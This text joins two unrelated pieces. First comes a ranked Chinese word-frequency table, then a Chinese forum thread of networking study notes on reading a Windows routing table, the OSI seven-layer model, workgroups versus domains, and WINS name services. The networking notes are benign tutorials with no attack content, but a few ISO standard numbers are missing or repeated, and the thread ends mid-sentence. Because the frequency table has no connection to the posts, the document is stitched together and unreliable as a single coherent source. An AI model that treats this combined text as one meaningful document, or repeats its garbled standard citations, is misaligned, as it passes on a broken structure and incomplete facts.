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1 66293.28 ,
2 45402.97 的
3 14216.88 了
4 12935.94 我
5 11879.45 一
6 9854.95 在
7 9574.07 是
8 6545.81 :
9 6117.56 他
10 5910.71 个
11 5043.01 你
12 4595.85 和
13 4594.67 不
14 4503.92 有
15 4194.90 就
16 4104.01 这
17 3876.87 也
18 3849.91 ?
19 3740.92 说
20 3738.57 人
21 3646.28 她
22 3594.69 着
23 3361.52 都
24 3080.78 !
25 2837.94 我们
26 2554.21 上
27 2491.89 年
28 2435.13 要
29 2405.63 地
30 2244.89 对
31 2165.51 …
32 2157.07 没有
33 2154.68 很
34 2138.08 到
35 2086.08 看
36 2068.57 去
37 2060.77 来
38 1997.12 )
39 1981.74 中
40 1961.02 (
41 1939.42 把
42 1921.32 自己
43 1917.41 还
44 1815.43 那
45 1782.58 会
46 1763.04 大
47 1691.44 又
48 1674.90 他们
49 1657.89 好
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53 1607.89 与
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55 1585.10 里
56 1557.84 两
57 1549.80 想
58 1546.09 》
59 1545.71 《
60 1512.01 什么
61 1487.78 被
62 1486.67 月
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66 1379.84 让
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70 1319.92 时
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72 1305.34 小
73 1249.97 点
74 1245.72 ;
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76 1197.43 后
77 1180.85 之
78 1171.14 ?
79 1145.52 日
80 1116.90 能
81 1106.78 中国
82 1097.26 过
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87 1033.72 几
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90 1008.58 因为
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92 988.96 #
93 971.90 这样
94 952.39 次
95 933.87 时候
96 920.03 没
97 916.48 现在
98 889.84 已经
99 865.97 ~
100 865.35 再
101 861.17 吧
102 856.84 天
103 855.24 不是
104 845.54 以
105 831.20 时间
106 828.91 还是
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109 813.23 呢
110 812.15 吗
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117 761.25 啊
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128 649.14 元
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137 617.89 |
138 617.58 或
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145 589.00 儿
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176 489.49 位
177 487.97 找
178 487.06 长
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181 483.33 美国
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191 466.75 成
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198 454.74 四
199 444.28 一起
200 444.00 如
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202 440.29 由
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223 402.67 见
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238 377.52 发展
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260 343.42 -
261 343.32 社会
262 342.76 比较
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264 341.93 先
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266 340.73 「
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268 338.93 」
269 336.99 内
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273 331.40 记者
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275 329.45 无
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277 327.11 号
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283 323.57 】
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292 311.94 声
293 311.21 头
294 311.07 正
295 310.08 住
296 309.06 学
297 307.36 每
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299 306.06 美
300 305.60 其他
301 305.06 水
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303 302.62 路
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309 298.69 阿
310 297.88 字
311 296.99 真的
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350 263.67 十
351 263.08 斯
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356 258.79 有人
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358 257.68 作者
359 257.62 一般
360 255.71 发生
361 254.63 评论
362 254.39 任何
363 254.20 企业
364 254.14 行
365 254.05 方面
366 253.54 作
367 252.86 电影
368 252.14 小时
369 252.10 首
370 251.86 ’
371 251.10 片
372 251.00 别人
373 250.73 同
374 248.20 上海
375 247.87 城市
376 247.07 必须
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378 246.19 第
379 245.96 另
380 245.23 ─
381 245.17 图
382 244.47 使用
383 244.28 发表
384 243.38 甚至
385 243.02 生
386 241.01 准备
387 240.99 对于
388 240.51 总
389 240.49 心里
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391 239.65 作为
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393 239.06 先生
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395 238.82 眼睛
396 238.64 尔
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400 235.16 象
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403 234.01 突然
404 232.78 半
405 232.66 间
406 231.99 因
407 230.59 选择
408 230.31 米
409 230.30 进
410 229.23 难
411 228.87 回复
412 228.48 ‘
413 228.36 看见
414 228.33 父亲
415 227.89 其中
416 227.86 多少
417 227.74 场
418 226.59 声音
419 224.67 得到
420 224.18 或者
421 223.61 谈
422 223.22 内容
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425 221.39 读
426 221.32 考试
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428 220.68 玩
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430 220.29 刚
431 220.23 人员
432 220.14 能够
433 220.00 六
434 219.81 参加
435 219.20 之间
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439 217.27 帮
440 217.25 送
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463 206.69 了解
464 206.51 令
465 206.07 并不
466 205.89 {
467 204.64 表示
468 203.87 故事
469 203.85 信息
470 202.46 干
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472 202.35 早
473 201.65 正在
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475 200.96 红
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477 200.01 应
478 199.82 国际
479 199.53 感到
480 199.29 无法
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485 196.52 加
486 196.24 特
487 195.14 信
488 195.11 找到
489 195.03 xURLx
490 194.64 受
491 194.41 篇
492 194.29 边
493 193.92 有关
494 193.16 儿子
495 192.60 一边
496 192.47 一天
497 192.09 包括
498 191.76 目前
499 191.58 眼
500 191.54 离开
501 191.15 部
502 191.01 她们
503 190.62 啦
504 190.20 介绍
505 190.17 哪
506 190.05 认识
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508 189.08 进入
509 186.86 只能
510 186.47 关于
511 186.46 家里
512 185.58 精神
513 185.29 不好
514 185.26 组织
515 185.13 音乐
516 184.58 能力
517 184.55 不知
518 183.91 机会
519 183.88 相信
520 183.71 注意
521 183.68 卡
522 183.55 似乎
523 183.53 除了
524 183.12 性
525 182.98 份
526 181.73 分钟
527 181.35 回家
528 180.77 卖
529 180.11 未
530 179.96 几乎
531 179.95 方法
532 179.95 来说
533 179.24 回答
534 178.67 联系
535 178.63 法
536 178.31 原因
537 178.26 回到
538 178.02 页
539 177.67 是不是
540 177.09 说话
541 177.01 明白
542 176.99 那样
543 175.25 指
544 174.36 按
545 174.11 是否
546 173.30 达
547 173.26 跑
548 173.08 即
549 172.90 极
550 172.67 黑
551 172.67 产品
552 172.60 真正
553 172.51 过程
554 172.36 以为
555 171.99 座
556 171.88 处
557 171.48 每个
558 171.39 不错
559 171.12 近
560 170.06 自然
561 169.90 西
562 169.82 经过
563 169.56 考
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565 168.98 支持
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嘿嘿,是给我自己扫盲,先都贴在这儿,有时间再看.各位有好贴请跟贴.谢谢!手把手教你读路由表源码:--------------------------------------------------------------------------------Active Routes: Network Destination Netmask Gateway Interface Metric 0.0.0.0 0.0.0.0 192.168.123.254 192.168.123.88 1 0.0.0.0 0.0.0.0 192.168.123.254 192.168.123.68 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 192.168.123.0 255.255.255.0 192.168.123.68 192.168.123.68 1 192.168.123.0 255.255.255.0 192.168.123.88 192.168.123.88 1 192.168.123.68 255.255.255.255 127.0.0.1 127.0.0.1 1 192.168.123.88 255.255.255.255 127.0.0.1 127.0.0.1 1 192.168.123.255 255.255.255.255 192.168.123.68 192.168.123.68 1 192.168.123.255 255.255.255.255 192.168.123.88 192.168.123.88 1 224.0.0.0 224.0.0.0 192.168.123.68 192.168.123.68 1 224.0.0.0 224.0.0.0 192.168.123.88 192.168.123.88 1 255.255.255.255 255.255.255.255 192.168.123.68 192.168.123.68 1 Default Gateway: 192.168.123.254 --------------------------------------------------------------------------------====================================================================== 当前的路由: destination 目的网段 mask 子网掩码 interface 到达该目的地的本路由器的出口ip gateway 下一跳路由器入口的ip,路由器通过interface和gateway定义一调到下一个路由器的链路,通常情况下,interface和gateway是同一网段的 metric 跳数,该条路由记录的质量,一般情况下,如果有多条到达相同目的地的路由记录,路由器会采用metric值小的那条路由 第一条 缺省路由:意思就是说,当一个数据包的目的网段不在你的路由记录中,那么,你的路由器该把那个数据包发送到哪里!缺省路由的网关是由你的连接上的default gateway决定的 该路由记录的意思是:当我接收到一个数据包的目的网段不在我的路由记录中,我会将该数据包通过192.168.123.88这个接口发送到192.168.123.254这个地址,这个地址是下一个路由器的一个接口,这样这个数据包就可以交付给下一个路由器处理,与我无关。该路由记录的线路质量 1 第二条 缺省路由: 该路由记录的意思是:当我接收到一个数据包的目的网段不在我的路由记录中,我会将该数据包通过192.168.123.68这个接口发送到192.168.123.254这个地址,这个地址是下一个路由器的一个接口,这样这个数据包就可以交付给下一个路由器处理,与我无关。该路由记录的线路质量 1 第三条 本地环路:127.0.0.0这个网段内所有地址都指向自己机器,如果收到这样一个数据,应该发向哪里 该路由记录的线路质量 1 第四条 直联网段的路由记录:当路由器收到发往直联网段的数据包时该如何处理,这种情况,路由记录的interface和gateway是同一个。 当我接收到一个数据包的目的网段是192.168.123.0时,我会将该数据包通过192.168.123.68这个接口直接发送出去,因为这个端口直接连接着192.168.123.0这个网段,该路由记录的线路质量 1 第五条 直联网段的路由记录 当我接收到一个数据包的目的网段是192.168.123.0时,我会将该数据包通过192.168.123.88这个接口直接发送出去,因为这个端口直接连接着192.168.123.0这个网段,该路由记录的线路质量 1 第六条 本地主机路由:当路由器收到发送给自己的数据包时将如何处理 当我接收到一个数据包的目的网段是192.168.123.68时,我会将该数据包收下,因为这个数据包时发送给我自己的,该路由记录的线路质量 1 第七条 本地主机路由:当路由器收到发送给自己的数据包时将如何处理 当我接收到一个数据包的目的网段是192.168.123.88时,我会将该数据包收下,因为这个数据包时发送给我自己的,该路由记录的线路质量 1 第八条 本地广播路由:当路由器收到发送给直联网段的本地广播时如何处理 当我接收到广播数据包的目的网段是192.168.123.255时,我会将该数据从192.168.123.68接口以广播的形势发送出去,该路由记录的线路质量 1 第九条 本地广播路由:当路由器收到发送给直联网段的本地广播时如何处理 当我接收到广播数据包的目的网段是192.168.123.255时,我会将该数据从192.168.123.88接口以广播的形势发送出去,该路由记录的线路质量 1 第十条 组播路由:当路由器收到一个组播数据包时该如何处理 当我接收到组播数据包时,我会将该数据从192.168.123.68接口以组播的形势发送出去,该路由记录的线路质量 1 第十一条 组播路由:当路由器收到一个组播数据包时该如何处理 当我接收到组播数据包时,我会将该数据从192.168.123.88接口以组播的形势发送出去,该路由记录的线路质量 1 第十二条 广播路由:当路由器收到一个绝对广播时该如何处理 当我接收到绝对广播数据包时,将该数据包丢弃掉[ Last edited by gxrflydeer on
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作者:xiezi99
网友解说OSI(供参考)OSI由重要计算机和远程通讯公司在1983年开始开发,最初的设想是成为一个接口规范。委员会决定建立一个通用参考模型,这样他人在其上就可以开发更为细节化的接口,从而成为标准。ISO采纳了OSI作为一个国际标准。&&在网络发展的初期,许多研究机构、计算机厂商和公司都大力发展计算机网络。从A R PA N E T(这个我想大家都应该知道一点点吧,第一代的实验网络)出现至今,已经推出了许多商品化的网络系统。这种自行发展的网络,在体系结构上差异很大以至于它们之间互不相容,难于相互连接以构成更大的网络系统。(哈哈,人类是聪明的,办法出现了。)&&为此,许多标准化机构积极开展了网络体系结构标准化方面的工作,其中最为著名的就是国际标准化组织I S O提出的开放系统互连参考模型O S I / R M。O S I参考模型是研究如何把开放式系统(即为了与其他系统通信而相互开放的系统)连接起来的标准。(这回大家知道,osi为什么要出现了吧,接下来在为大家具体的讲讲osi的内容。)OSI的核心是两个终端用户在远程通讯网络中的通讯可以分成层,每层有自己的功能集。(这个比较关键)& && &O S I参考模型将计算机网络分为7层,(呵呵,够多吧。)我们将从最底层开始,依次讨论模型的各层所要完成的功能。(我想画给大家来着,可惜从上小学到现在,美术没有及格过,所以。。。。。还是免了吧。)1. 物理层物理层(physical layer)的主要功能是完成相邻结点之间原始比特流的传输。物理层协议关心的典型问题是使用什么样的物理信号来表示数据“ 1”和“ 0”;一位持续的时间多长;数据传输是否可同时在两个方向上进行;最初的连接如何建立和完成通信后连接如何终止;物理接口(插头和插座)有多少针以及各针的用处。物理层的设计主要涉及物理层接口的机械、电气、功能和过程特性,以及物理层接口连接的传输介质等问题。物理层的设计还涉及到通信工程领域内的一些问题。(这一层表示了用户的软件与硬件之间的实际连接。它实际上与任何协议都不相干,但它定义了数据链路层所使用的访问方法。)& &物理层是OSI参考模型的最低层,向下直接与物理传输介质相连接。物理层协议是各种网络设备进行互连时必须遵守的低层协议。设立物理层的目的是实现两个网络物理设备之间的二进制比特流的透明传输,对数据链路层屏蔽物理传输介质的特性,以便对高层协议有最大的透明性。 ISO对OSI参考模型中的物理层做了如下定义:  物理层为建立、维护和释放数据链路实体之间的二进制比特传输的物理连接提供机械的、电气的、功能的和规程的特性。物理连接可以通过中继系统,允许进行全双工或半双工的二进制比特流的传输。物理层的数据服务单元是比特,它可以通过同步或异步的方式进行传输。(上面两段是我的笔记,大家好好看看,嘿嘿~~~~~~~写这段可不容易,因为我以前写字太难看了,现在看起来好费劲。)来个总结发言吧,哈哈~物理层主要特点是:(1)物理层主要负责在物理连接上传输二进制比特流;(2)物理层提供为建立、维护和释放物理连接所需要的机械、电气、功能与规程的特性。(晕,怎么感觉这个总结是废话呢?)2. 数据链路层数据链路层( data link layer)的主要功能是如何在不可靠的物理线路上进行数据的可靠传输。数据链路层完成的是网络中相邻结点之间可靠的数据通信。为了保证数据的可靠传输,发送方把用户数据封装成帧( f r a m e),并按顺序传送各帧。由于物理线路的不可靠,因此发送方发出的数据帧有可能在线路上发生出错或丢失(所谓丢失实际上是数据帧的帧头或帧尾出错),从而导致接收方不能正接收到数据帧。为了保证能让接收方对接收到的数据进行正确性判断,发送方为每个数据块计算出C R C(循环冗余检验)并加入到帧中,这样接收方就可以通过重新计算C R C来判断数据接收的正确性。一旦接收方发现接收到的数据有错,则发送方必须重传这一帧数据。然而,相同帧的多次传送也可能使接收方收到重复帧。比如,接收方给发送方的确认帧被破坏后,发送方也会重传上一帧,此时接收方就可能接收到重复帧。数据链路层必需解决由于帧的损坏、丢失和重复所带来的问题。(眼睛好累,明天继续吧,估计你也看累了,休息一会吧。)数据链路可以粗略地理解为数据通道(比较不负责的一句话)物理层要为终端设备间的数据通信提供传输媒体及其连接.媒体是长期的,连接是有生存期的.在连接生存期内,收发两端可以进行不等的一次或多次数据通信.每次通信都要经过建立通信联络和拆除通信联络两过程.这种建立起来的数据收发关系就叫作数据链路。(这个地方是重点,因为我学的时候容易把物理层和链路弄混,这个地方解释比较清楚。)而在物理媒体上传输的数据难免受到各种不可靠因素的影响而产生差错,为了弥补物理层上的不足,为上层提供无差错的数据传输,就要能对数据进行检错和纠错.数据链路的建立,拆除,对数据的检错,纠错是数据链路层的基本任务。(下面其实也一样一层为一层服务呗~~~~)。嘿嘿,在做一回总结。链路层的主要功能链路层是为网络层提供数据传送服务的,这种服务要依靠本层具备的功能来实现。链路层应具备如下功能:1:链路连接的建立,拆除,分离。2:帧定界和帧同步。链路层的数据传输单元是帧,协议不同,帧的长短和界面也有差别,但无论如何& && && && &必须对帧进行定界。3:顺序控制,指对帧的收发顺序的控制。4:差错检测和恢复。还有链路标识,流量控制等等.差错检测多用方阵码校验和循环码校验来检测信& & 道上数据的误码,而帧丢失等用序号检测.各种错误的恢复则常靠反馈重发技术来完成。 如果有人不知道“帧”是什么,那就自己找材料,我是不行了。数据链路层的主要协议数据链路层协议是为发对等实体间保持一致而制定的,也为了顺利完成对网络层的服务。主要协议如下:ISO:"数据通信系统的基本型控制规程".这是一种面向字符的标准,利用10个控制字符完成链路的建立,拆除及数据交换.对帧的收发情况及差错恢复也是靠这些字符来完成.ISO1155, ISO1177, ISO2626, ISO2629等标准的配合使用可形成多种链路控制和数据传输方式. ISO:称为"HDLC 帧结构".ISO:称为"HDLC 规程要素 ".ISO:称为"HDLC 规程类型汇编".这3个标准都是为面向比特的数据传输控制而制定的.有人习惯上把这3个标准组合称为高级链路控制规程. ISO7776:称为"DTE数据链路层规程".与CCITT X.25LAB"平衡型链路访问规程"相兼容. (诶~~~~这个地方是在朋友家电脑里找到的,自己其实也没看明白。)链路,就介绍这么多啦,我想看到这里,基本该懂的也都懂了,我觉得我比我们老师讲的要细多了。3. 网络层网络层(network layer)的主要功能是完成网络中主机间的报文传输,其关键问题之一是使用数据链路层的服务将每个报文从源端传输到目的端。在广域网中,这包括产生从源端到目的端的路由,并要求这条路径经过尽可能少的I M P。如果在子网中同时出现过多的报文,子网可能形成拥塞,必须加以避免,此类控制也属于网络层的内容。当报文不得不跨越两个或多个网络时,又会产生很多新问题。例如第二个网络的寻址方法可能不同于第一个网络;第二个网络也可能因为第一个网络的报文太长而无法接收;两个网络使用的协议也可能不同,等等。网络层必须解决这些问题,使异构网络能够互连。在单个局域网中,网络层是冗余的,因为报文是直接从一台计算机传送到另一台计算机的,因此网络层所要做的工作很少。网络层主要功能网络层为建立网络连接和为上层提供服务,应具备以下主要功能:1路由选择和中继 2激活,终止网络连接 3在一条数据链路上复用多条网络连接,多采取分时复用技术4差错检测与恢复5排序,流量控制6服务选择7网络管理网络层标准简介网络层的一些主要标准如下:ISO.DIS8208:称为"DTE用的X.25分组级协议" ISO.DIS8348:称为"CO 网络服务定义"(面向连接) ISO.DIS8349:称为"CL 网络服务定义"(面向无连接) ISO.DIS8473:称为"CL 网络协议" ISO.DIS8348:称为"网络层寻址" 除上述标准外,还有许多标准。这些标准都只是解决网络层的部分功能,所以往往需要在网络层中同时使用几个标准才能完成整个网络层的功能.由于面对的网络不同,网络层将会采用不同的标准组合. ok,又搞定一层。-__-!补充一句在具有开放特性的网络中的数据终端设备,都要配置网络层的功能.现在市场上销售的网络硬设备主要有网关和路由器.HOHO~~~~~4. 传输层传输层( transport layer)的主要功能是完成网络中不同主机上的用户进程之间可靠的数据通信。传输层要决定对会话层用户,最终对网络用户,提供什么样的服务。最好的传输连接是一条无差错的、按顺序传送数据的管道,即传输层连接是真正端到端的。换言之,源端机上的某进程,利用报文头和控制报文与目标机上的对等进程进行对话。在传输层下面的各层中,协议是每台机器与它的直接相邻机器之间(主机- I M P、I M P-I M P)的协议,而不是最终的源端机和目标机之间(主机-主机)的协议。在它们中间,可能还隔着多个I M P。即1至3层的协议是点到点的协议,而4至7层的协议是端到端的协议。由于绝大多数主机都支持多用户操作,因而机器上有多道程序,这意味着多条连接将进出于这些主机,因此需要以某种方式区别报文属于哪条连接。识别这些连接的信息可以放入传输层的报文头中。除了将几个报文流多路复用到一条通道上,传输层还必须管理跨网连接的建立和拆除。这就需要某种命名机制,使机器内的进程能够讲明它希望交谈的对象。另外,还需要有一种机制来调节信息流,使高速主机不会过快地向低速主机传送数据。尽管主机之间的流量控制与I M P之间的流量控制不尽相同,但是稍后我们将看到类似的原理对二者都适用。其实我自己是这么想的,这一层就等于是端口到端口~不知道我这么理解对不对?比如说A机器的QQ消息到了B机器的时候,就是通过这一层的相关协议找4000端口的。(我自己这么想的,如果不对,大家一定告诉我哦)第一个端到端的层次,具有缓冲作用。当网络层服务质量不能满足要求时,它将服务加以提高,以满足高层的要求;当网络层服务质量较好时,它只用很少的工作。传输层还可进行复用,即在一个网络连接上创建多个逻辑连接。 (这是在网上摘录的一句,比较经典,哈哈。)在补充一句:传输层也称为运输层.传输层只存在于端开放系统中,是介于低3层通信子网系统和高3层之间的一层,但是很重要的一层.因为它是源端到目的端对数据传送进行控制从低到高的最后一层.基本上就是这些啦,该交代的都交代了。在深如了解就的自己买书看了,没办法在网上发了恩,还有些内容,感觉不算是重点,还是放上来看看吧。有一个既存事实,即世界上各种通信子网在性能上存在着很大差异.例如电话交换网,分组交换网,公用数据交换网,局域网等通信子网都可互连,但它们提供的吞吐量,传输速率,数据延迟通信费用各不相同.对于会话层来说,却要求有一性能恒定的界面.传输层就承担了这一功能.它采用分流/合流,复用/介复用技术来调节上述通信子网的差异,使会话层感受不到.此外传输层还要具备差错恢复,流量控制等功能,以此对会话层屏蔽通信子网在这些方面的细节与差异.传输层面对的数据对象已不是网络地址和主机地址,而是和会话层的界面端口.上述功能的最终目的是为会话提供可靠的,无误的数据传输.传输层的服务一般要经历传输连接建立阶段,数据传送阶段,传输连接释放阶段3个阶段才算完成一个完整的服务过程.而在数据传送阶段又分为一般数据传送和加速数据传送两种。传输层服务分成5种类型.基本可以满足对传送质量,传送速度,传送费用的各种不同需要.传输层的协议标准有以下几种:ISO8072:称为"面向连接的传输服务定义" ISO8072:称为"面向连接的传输协议规范" 收工~~~~~~~~明天继续。5. 会话层会话层( session layer)允许不同机器上的用户之间建立会话关系。会话层允许进行类似传输层的普通数据的传送,在某些场合还提供了一些有用的增强型服务。允许用户利用一次会话在远端的分时系统上登录,或者在两台机器间传递文件。会话层提供的服务之一是管理对话控制。会话层允许信息同时双向传输,或任一时刻只能单向传输。如果属于后者,类似于物理信道上的半双工模式,会话层将记录此时该轮到哪一方。一种与对话控制有关的服务是令牌管理( token management)。有些协议保证双方不能同时进行同样的操作,这一点很重要。为了管理这些活动,会话层提供了令牌,令牌可以在会话双方之间移动,只有持有令牌的一方可以执行某种关键性操作。另一种会话层服务是同步。如果在平均每小时出现一次大故障的网络上,两台机器间要进行一次两小时的文件传输,想想会出现什么样的问题?每一次传输中途失败后,都不得不重新传送这个文件。当网络再次出现大故障时,可能又会半途而废。为了解决这个问题,会话层提供了一种方法,即在数据中插入同步点。每次网络出现故障后,仅仅重传最后一个同步点以后的数据。(不懂不懂不懂,7层这一层我基本上课的时候听不明白,问老师,由于问的太多了,最后老师把我开除了-__-!!。)为会话实体间建立连接。为给两个对等会话服务用户建立一个会话连接,应该做如下几项工作:1将会话地址映射为运输地址 2选择需要的运输服务质量参数(QOS)3对会话参数进行协商 4识别各个会话连接 5传送有限的透明用户数据 总感觉这一层好象用处不大????(个人意见 ,大家别用鸡蛋丢我哦)6. 表示层表示层( presentation layer)完成某些特定的功能,对这些功能人们常常希望找到普遍的解决办法,而不必由每个用户自己来实现。值得一提的是,表示层以下各层只关心从源端机到目标机可靠地传送比特,而表示层关心的是所传送的信息的语法和语义。表示层服务的一个典型例子是用一种大家一致选定的标准方法对数据进行编码。大多数用户程序之间并非交换随机的比特,而是交换诸如人名、日期、货币数量和发票之类的信息。这些对象是用字符串、整型数、浮点数的形式,以及由几种简单类型组成的数据结构来表示。网络上计算机可能采用不同的数据表示,所以需要在数据传输时进行数据格式的转换。例如在不同的机器上常用不同的代码来表示字符串( A S C I I和E B C D I C)、整型数(二进制反码或补码)以及机器字的不同字节顺序等。为了让采用不同数据表示法的计算机之间能够相互通信并交换数据,我们在通信过程中使用抽象的数据结构(如抽象语法表示A S N . 1)来表示传送的数据,而在机器内部仍然采用各自的标准编码。管理这些抽象数据结构,并在发送方将机器的内部编码转换为适合网上传输的传送语法以及在接收方做相反的转换等工作都是由表示层来完成的。另外,表示层还涉及数据压缩和解压、数据加密和解密等工作。这一层没什么好多说的了,看名字都知道是什么回事了。7. 应用层连网的目的在于支持运行于不同计算机的进程进行通信,而这些进程则是为用户完成不同任务而设计的。可能的应用是多方面的,不受网络结构的限制。应用层( application layer)包含大量人们普遍需要的协议。虽然,对于需要通信的不同应用来说,应用层的协议都是必须的。例如, P C机用户使用仿真终端软件通过网络仿真某个远程主机的终端并使用该远程主机的资源。这个仿真终端程序使用虚拟终端协议将键盘输入的数据传送到主机的操作系统,并接收显示于屏幕的数据。再比如,当某个用户想要获得远程计算机上的一个文件拷贝时,他要向本机的文件传输软件发出请求,这个软件与远程计算机上的文件传输进程通过文件传输协议进行通信,这个协议主要处理文件名、用户许可状态和其他请求细节的通信。远程计算机上的文件传输进程使用其他特征来传输文件内容。由于每个应用有不同的要求,应用层的协议集在I S O / O S I模型中并没有定义,但是,有些确定的应用层协议,包括虚拟终端、文件传输、和电子邮件等都可作为标准化的候选终于写完啦~~~~~~哈哈哈!庆祝一下,自己去买个冰淇淋吃去~~~~HOHO~结尾值得注意的是, O S I模型本身不是网络体系结构的全部内容,这是因为它并未确切地描述用于各层的协议和实现方法,而仅仅告诉我们每一层应该完成的功能。不过, I S O已经为各层制定了相应的标准,但这些标准并不是模型的一部分,它们是作为独立的国际标准而被发布的。在O S I参考模型中,有三个基本概念:服务、接口和协议。也许O S I模型的最重要的贡献是将这三个概念区分清楚了。O S I参考模型是在其协议开发之前设计出来的。这意味着O S I模型不是基于某个特定的协议集而设计的,因而它更具有通用性。但另一方面,也意味着O S I模型在协议实现方面存在某些不足。实际上,O S I协议过于复杂,这也是O S I从未真正流行开来的原因所在。虽然O S I模型和协议并未获得巨大的成功,但是O S I参考模型在计算机网络的发展过程中仍然起到了非常重要的指导作用,作为一种参考模型和完整体系,它仍对今后计算机网络技术朝标准化、规范化方向发展具有指导意义
作者:xiezi99
局域网中工作组和域之间的差别(转帖)为什么要组建局域网呢?就是要实现资源的共享,既然资源要共享,资源就不会太少。如何管理这些在不同机器上的资源呢?域和工作组就是在这样的环境中产生的两种不同的网络资源管理模式。那么究竟什么是域,什么是工作组呢?它们的区别又是什么呢?   “自由”的工作组  工作组(Work Group)就是将不同的电脑按功能分别列入不同的组中,以方便管理。比如在一个网络内,可能有成百上千台工作电脑,如果这些电脑不进行分组,都列在“网上邻居”内,可想而知会有多么乱(恐怕网络邻居也会显示“下一页”吧)。为了解决这一问题,Windows 9x/NT/2000才引用了“工作组”这个概念,比如一所高校,会分为诸如数学系、中文系之类的,然后数学系的电脑全都列入数学系的工作组中,中文系的电脑全部都列入到中文系的工作组中……如果你要访问某个系别的资源,就在“网上邻居”里找到那个系的工作组名,双击就可以看到那个系别的电脑了。   那么怎么样才能加入到工作组中呢?其实方法很简单,只需要右击Windows桌面上的“网上邻居”,在弹出的菜单出选择“属性”,点击“标识”,在“计算机名”一栏中添入你想好的名字,在“工作组”一栏中添入你想加入的工作组名称。如果你输入的工作组名称是一个不存在的工作组,那么就相当于新建一个工作组,当然也只有你自己的电脑在里面。不过要注意,计算机名和工作组的长度都不能超过15个英文字符,可以输入汉字,但是也不能超过7个汉字。“计算机说明”是附加信息,不填也可以,但是最好填上一些这台电脑主人的信息,如“数学系主机”等。单击“确定”按钮后,Windows 98提示需要重新启动,按要求重新启动之后,再进入“网上邻居”,就可以看到你所在工作组的成员了。   相对而言,所处在同一个工作组内部成员相互交换信息的频率最高,所以你一进入“网上邻居”,首先看到的是你所在工作组的成员。如果要访问其他工作组的成员,需要双击“整个网络”,然后你才会看到网络上其他的工作组,双击其他工作组的名称,这样你才可以看到里面的成员,与之实现资源交换。   除此之外,你也可以退出某个工作组,方法也很简单,只要将工作组名称改变一下即可。不过这样在网上别人照样可以访问你的共享资源,只不过换了一个工作组而已。也就是说,你可以随便加入同一网络上的任何工作组,也可以随时离开一个工作组。“工作组”就像一个自由加入和退出的俱乐部一样。它本身的作用仅仅是提供一个“房间”,以方便网上计算机共享资源的浏览。   域的管理和设置  打个比方,如果说工作组是“免费的旅店”那么域(Domain)就是“星级的宾馆”;工作组可以随便出出进进,而域则需要严格控制。“域”的真正含义指的是服务器控制网络上的计算机能否加入的计算机组合。一提到组合,势必需要严格的控制。所以实行严格的管理对网络安全是非常必要的。在对等网模式下,任何一台电脑只要接入网络,其他机器就都可以访问共享资源,如共享上网等。尽管对等网络上的共享文件可以加访问密码,但是非常容易被破解。在由Windows 9x构成的对等网中,数据的传输是非常不安全的。   不过在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为“域控制器(Domain Controller,简写为DC)”。   域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确,那么域控制器就会拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,他只能以对等网用户的方式访问Windows共享出来的资源,这样就在一定程度上保护了网络上的资源。   要把一台电脑加入域,仅仅使它和服务器在网上邻居中能够相互“看”到是远远不够的,必须要由网络管理员进行相应的设置,把这台电脑加入到域中。这样才能实现文件的共享。   1. 服务器端设置  以系统管理员身份在已经设置好Active Directory(活动目录)的Windows 2000 Server上登录,选择“开始”菜单中“程序”选项中的“管理工具”,然后再选择“Active Directory用户和计算机”,之后在程序界面中右击“Computers”,在弹出的菜单中单击“新建”,然后选择“计算机”,之后填入想要加入域的计算机名即可。要加入域的计算机名最好为英文,中文计算机名可能会引起一些问题。   2. 客户端设置  首先要确认计算机名称是否正确,然后在桌面“网上邻居”上右击鼠标,点击“属性”出现网络属性设置窗口,确认“主网络登录”为“Microsoft网络用户”。选中窗口上方的“Microsoft网络用户”(如果没有此项,说明没有安装,点击“添加”安装“Microsoft网络用户”选项)。点击“属性”按钮,出现“Microsoft网络用户属性”对话框,选中“登录到Windows NT域”复选框,在“Windows NT域”中输入要登录的域名即可。这时,如果是Windows 98操作系统的话,系统会提示需要重新启动计算机,重新启动计算机之后,会出现一个登录对话框。在输入正确的域用户账号、密码以及登录域之后,就可以使用Windows 2000 Server域中的资源了。请注意,这里的域用户账号和密码,必须是网络管理员为用户建的那个账号和密码,而不是由本机用户自己创建的账号和密码。如果没有将计算机加入到域中,或者登录的域名、用户名、密码有一项不正确,都会出现错误信息。
作者:xiezi99
简述WINS和DNSWINS服务WINS是Windows Internet Name Server(Windows网际名字服务)的简称。WINS为NetBIOS名字提供名字注册、更新、释放和转换服务,这些服务允许WINS服务器维护一个将NetBIOS名链接到IP地址的动态数据库,大大减轻了对网络交通的负担。一.我们为什么需要WINS服务在默认状态中,网络上的每一台计算机的NetBIOS名字是通过广播的方式来提供更新的,也就是说,假如网络上有n台计算机,那么每一台计算机就要广播n-1次,对于小型网络来说,这似乎并不影响网络交通,但是当大型网络来说,加重了网络的负担。因此WINS对大中型企业来说尤其重要。二.WINS工作原理上面说过,WINS服务器为客户端提供名字注册了、更新、释放和转换服务,下面就详细介绍这四个基本服务的工作原理:1.名字注册名字注册就是客户端从WINS服务器获得信息的过程,在WINS服务中,名字注册是动态的。当一个客户端启动时,它向所配置的WINS服务器发送一个名字注册信息(包括了客户机的IP地址和计算机名),如果WINS服务器正在运行,并且没有没有其它客户计算机注册了相同的名字,服务器就向客户端计算机返还一个成功注册的消息(包括了名字注册的存活期----TTL)。与IP地址一样,每个计算机都要求有唯一的计算机名,否则就无法通信。如果名字已经被其它计算机注册了,WINS服务将会验证该名字是否正在使用。如果该名字正在使用则注册失败(发回一个负确认的信息),否则就可以继续注册。2.名字更新因为客户端被分配了一个TTL(存活期),所有它的注册也有一定的期限,过了这个期限,WINS服务器将从数据库中删除这个名字的注册信息。它的过程是这样的:(1).在过了存活期的1/8后,客户端开始不断试图更新它的名字注册,如果收到不到任何响应,WINS客户端每过2分钟重复更新浓度,直到存活期过了一半。(2).当存活期过了一半时,WINS客户端将尝试与次选WINS服务器更新它的租约,它的过程与首选WINS服务器一样。(3).如果时间过了一半后仍然没有成功的话,该客户端又回到它的首选WINS服务器了。在该过程中,不管是与首选还是次选WINS服务器,一旦名字注册成功之后,该WINS客户端的名字注册将被提供一个新的TTL值。WINS服务介绍(二)3.名字释放在客户端的正常关机过程中,WINS客户端